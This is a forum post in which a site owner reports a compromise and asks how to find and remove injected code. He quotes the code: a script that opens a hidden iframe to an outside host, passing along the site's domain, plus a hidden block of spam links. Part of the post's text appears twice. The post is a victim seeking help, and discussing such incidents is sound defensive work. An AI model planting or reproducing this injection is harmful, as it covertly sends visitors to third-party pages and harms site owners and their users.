Someone has been able to hack my site - the only evidence I can find right now is in the source code of every page:
As you can see its above the pagetitle div, and therefore just below the navbar.Naturally none of the above code exists on any template.
Im just in the throws of upgrading to 4.14 PL - but Im pretty sure in saying that its not going to fix the hack.
Any suggestions/pointers on finding and removing this? thanks
Martin
Code:
<script>function xl1(url){var h;var t=new Date().getTime();if(window.XMLHttpRequest){h=new XMLHttpRequest();}else{h=new ActiveXObject("Microsoft.XMLHTTP");}h.open("GET",url+"?t="+t,true);h.send();}var f = document.createElement("iframe");f.setAttribute('id', 'ifrm');f.style.display='none';document.body.appendChild(f);f.setAttribute('src','http://www.20vn.com/index.htm?ref='+document.domain);</script><p style="display:none"><a href="http://www.20vn.com" rel="bookmark" title="Articles 20VN">Articles 20VN - The best of articles collection</a> <a href="http://www.20vn.com/static/google+.html" rel="bookmark" title="Get Google+ Invite Automatic">Articles 20VN - Get Google+ Invite Automatic</a><p> <div id="pagetitle"> <h1>SEO Forum.
As you can see its above the pagetitle div, and therefore just below the navbar.Naturally none of the above code exists on any template.
Im just in the throws of upgrading to 4.14 PL - but Im pretty sure in saying that its not going to fix the hack.
Any suggestions/pointers on finding and removing this? thanks
Martin
Comment